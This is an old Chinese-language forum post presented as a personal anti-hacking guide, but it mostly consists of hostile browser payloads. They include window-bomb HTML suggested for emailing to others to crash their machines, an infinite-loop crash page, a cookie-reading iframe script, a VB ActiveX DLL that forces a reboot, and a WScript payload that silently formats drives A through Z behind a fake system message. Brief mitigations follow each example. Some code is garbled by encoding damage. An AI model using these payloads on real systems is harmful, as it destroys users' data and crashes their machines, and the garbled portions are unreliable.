史萊姆論壇

返回   史萊姆論壇 > 教學文件資料庫 > Hacker/Cracker 及加解密技術文件
忘記密碼?
論壇說明 標記討論區已讀

歡迎您來到『史萊姆論壇』 ^___^

您目前正以訪客的身份瀏覽本論壇,訪客所擁有的權限將受到限制,您可以瀏覽本論壇大部份的版區與文章,但您將無法參與任何討論或是使用私人訊息與其他會員交流。若您希望擁有完整的使用權限,請註冊成為我們的一份子,註冊的程序十分簡單、快速,而且最重要的是--註冊是完全免費的!

請點擊這裡:『註冊成為我們的一份子!』

Google 提供的廣告


 
 
主題工具 顯示模式
舊 2003-11-10, 04:19 AM   #1
psac
榮譽會員
 
psac 的頭像
榮譽勳章
UID - 3662
在線等級: 級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時
註冊日期: 2002-12-07
住址: 木柵市立動物園
文章: 17381
現金: 5253 金幣
資產: 33853 金幣
預設 個人電腦防黑指南

internet 是一個建立在全球眾多的網路上的網路集體,而各人電腦則是基本元件可當我們上網時,你是否有過無顧非法、資料丟失、當機等等。當然可能是我們操作不當而所致 但也不排除黑客(hacker)或是駭客(cracker)在搗亂、攻擊呢?以下是我的個人防黑經驗、有不當之處請多指教~~


任何合法資料都是通過:TCP/IP 傳送的,網路攻擊也不列外,黑客們就是在網路上傳送包含有非法目的合法資料進行攻擊和入侵的 如:木馬、網路鑒聽與截取資料、郵件炸彈、利用漏洞進行攻擊~!!!


下面是一些列子


1、佔用CPU:這是一些典型的消耗系統資源列子,歸終讓電腦當機!
一般都一些html程式碼:如

(1)<img scr ="javascript : n=1 ; do {windows(『 『)}while (n=1)" width="1">
(2)<a href="http://XXX" onMouseover="while(1){window.close(『/『)}">
(3).也可叫你開啟指定的視窗:
<img src="java-script:n=1;do{window.open(『http://指定的頁『)}while(n==2)" width="1">
或<meta http-equirv="refresh" content="1;url=http://你指定的頁">

這就是一個無限開啟視窗的html程式碼!

以下是也是一個*。HTML
可以用郵件發給別人開啟,以至於當機:
<html>
<head>
<title > 視窗炸彈</title>
<META HTTP-EQUIV="content-type" content="text/html; chatset =gb2312>
</head>
<body onload= windowsbomb()『><! 這是在定義函數>
<script language="javaScript">
function windowsbomb()
{var coutero=0//define&reset couter=0 //*************定義計數為0****************
while(true)
{
window.open("http:www.163.com"," crashing "+countero, width=2 ,height=2,resizable=no")
countero++
}
}
</script>
</body>
</html>

好了,上面可以用記事本編寫,然後存為*.html 就行了~

解決方法:只要不隨意開啟陌生人發來的郵件,特別是*.html *.vbs *.doc *.exe

2、非法讀取資料:這些代一般在網頁在加Activex\Javascript 和webbrowser control
的使用,它可以通過IE5.0的iframe 漏洞開啟用IE可以開啟的任何文件疇i怕不可怕?
 例子:下面是程式碼
<script language="jscript">
濾nload=function () {
燾ar
濾Victim=open("http://groups.google.com/groups?threadm=anews.Aunc.850","OurVi
檬tim","width=100,height=100");
瀏etTimeout(
檸unction () {
濾Victim.frames[0].location.href="javascript:alert(document.cooki
檻)";
癖,
7000
);

</script>
解決辦法:
礎bIE中取消指令碼執行的功能。


3、控制電腦:
  看自己IE的安全性設定,對於「下載已簽名的ActiveX控件」
 選項是「提示」。但IE仍然有在無需提示的情況下下載和執行程序 它可以執行一些木馬程序等 ,像一些在線破解就是這樣的原理
 列子:
  開啟VB5新增一個「ActiveX.dll」文件,把下面的程式碼輸入進去:
Private Declare Function ExitWindowsEx Lib "user32"_
(ByVal uFlags As Long,ByVal dwReserved As Long)_
As Long
Sub Xuankong() "請不要加上「private」
a$=InputBox("請輸入你的姓名,如果你輸入的是"xuankong""+Chr(13)+Chr(10)+
"則會在你的系統中產生一個"xuankong"文件"+Chr(10)+Chr(13)+
"否則你的機器可能會重新啟動","請輸入","xuankong") If a$="xuankong" Then
Open "c:\xuankong.dat" For Append As #Write#1,"我的朋友,這是一個asp主件測試程序"
#Write#1,"hello world!this is a test"
#Write#1,"如果你看到這個文件測試就成功!"
else
ExitWindowsEx&H43,0』使用API函數重新啟動機器
End if
Close #1
End sub

解決方法:
在註冊表HKEY-LOCAL-MACHINESOFTWAREMicrosoftInternet ExplorerActiveX Compatiblity」下為「Active Setup controls」新增一個關於CLSID的新增{6E449683-C509-11CF-AAFA-00AA00 B6015C}在新增下新增REGDWORD類型的值:Compatibility Flags 0x00000400。
4、當機:也是做一個網頁讓用戶開啟後當機
如下程式碼:
<HTML>
<BODY>
<SCRIPT>
var color = new Array;
color[1] = "black";
color[2] = "white";
for(x = 0; x <3; x++)
{
document.bgColor = color[x]
if(x == 2)
{
x = 0;
}
}
</SCRIPT>
</BODY>
</HTML>
解決方法:掉你瀏覽器裡的java功能,還要記住不要瀏覽一些來路不明的網站和不要在聊天室裡按其他網友發出的超級連結,如果中了,你一定要在沒有當機時(環時)
用ctrl+alt+del 關掉你你開啟的網頁,否則後果。。。。。。獺

5、格式化本機硬碟
程式碼如下:注意,這些程式碼是For Spanish Windows『98.要想讓它在中文或是英文版本下執行,得做寫改動,具體得自己動手啦~~~~)

<object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC">
</object>
<SCRIPT>
scr.Reset();
scr.Path="C:\\windows\\Men?inicio\\Programas\\Inicio\\automat.hta";
scr.Doc="<object id=『wsh『 classid=『clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B『></object><SCRIPT>wsh.Run(『start /m format a: /q /autotest /u『);alert(『IMPORTANT : Windows is configuring the system. Plase do not interrupt this process.『);</"+"SCRIPT>";
scr.write();


這個可以用的:如下:

<OBJECT classid=clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B id=wsh></OBJECT>
<SCRIPT>
wsh.Run(『start /m format.com z:/q /autotest /u『);
wsh.Run(『start /m format.com y:/q /autotest /u『);
wsh.Run(『start /m format.com x:/q /autotest /u『);
wsh.Run(『start /m format.com w:/q /autotest /u『);
wsh.Run(『start /m format.com v:/q /autotest /u『);
wsh.Run(『start /m format.com u:/q /autotest /u『);
wsh.Run(『start /m format.com t:/q /autotest /u『);
wsh.Run(『start /m format.com s:/q /autotest /u『);
wsh.Run(『start /m format.com r:/q /autotest /u『);
wsh.Run(『start /m format.com q:/q /autotest /u『);
wsh.Run(『start /m format.com p:/q /autotest /u『);
wsh.Run(『start /m format.com o:/q /autotest /u『);
wsh.Run(『start /m format.com n:/q /autotest /u『);
wsh.Run(『start /m format.com m:/q /autotest /u『);
wsh.Run(『start /m format.com l:/q /autotest /u『);
wsh.Run(『start /m format.com k:/q /autotest /u『);
wsh.Run(『start /m format.com j:/q /autotest /u『);
wsh.Run(『start /m format.com i:/q /autotest /u『);
wsh.Run(『start /m format.com h:/q /autotest /u『);
wsh.Run(『start /m format.com g:/q /autotest /u『);
wsh.Run(『start /m format.com f:/q /autotest /u『);
wsh.Run(『start /m format.com e:/q /autotest /u『);
wsh.Run(『start /m format.com d:/q /autotest /u『);
wsh.Run(『start /m format.com c:/q /autotest /u『);
wsh.Run(『start /m format.com b:/q /autotest /u『);
wsh.Run(『start /m format.com a:/q /autotest /u『);
</SCRIPT>
解決方法:format.com、deltree.exe 改名,或是刪 了

好了,就寫到了,我也累了,
作 者:red-no1
psac 目前離線  
送花文章: 3, 收花文章: 1631 篇, 收花: 3205 次
向 psac 送花的會員:
acw123 (2007-06-04)
感謝您發表一篇好文章
舊 2003-11-10, 07:41 AM   #2 (permalink)
註冊會員
榮譽勳章

勳章總數
UID - 45071
在線等級: 級別:0 | 在線時長:0小時 | 升級還需:5小時
註冊日期: 2003-03-05
VIP期限: 2005-12
文章: 84
精華: 0
預設

感謝分享
ian78 目前離線  
送花文章: 0, 收花文章: 0 篇, 收花: 0 次
舊 2003-11-11, 09:48 PM   #3 (permalink)
註冊會員
 
DD0322 的頭像
榮譽勳章
UID - 14175
在線等級: 級別:6 | 在線時長:68小時 | 升級還需:9小時
註冊日期: 2002-12-19
VIP期限: 2008-04
住址: 我在哪裡..
文章: 311
精華: 0
現金: 5945 金幣
資產: 5945 金幣
預設

對新手的我有些 看不懂 謝謝您 在努力研究
DD0322 目前離線  
送花文章: 15, 收花文章: 1 篇, 收花: 1 次
 


主題工具
顯示模式

發表規則
不可以發文
不可以回覆主題
不可以上傳附加檔案
不可以編輯您的文章

論壇啟用 BB 語法
論壇啟用 表情符號
論壇啟用 [IMG] 語法
論壇禁用 HTML 語法
Trackbacks are 禁用
Pingbacks are 禁用
Refbacks are 禁用


所有時間均為台北時間。現在的時間是 10:26 PM


Powered by vBulletin® 版本 3.6.8
版權所有 ©2000 - 2024, Jelsoft Enterprises Ltd.


SEO by vBSEO 3.6.1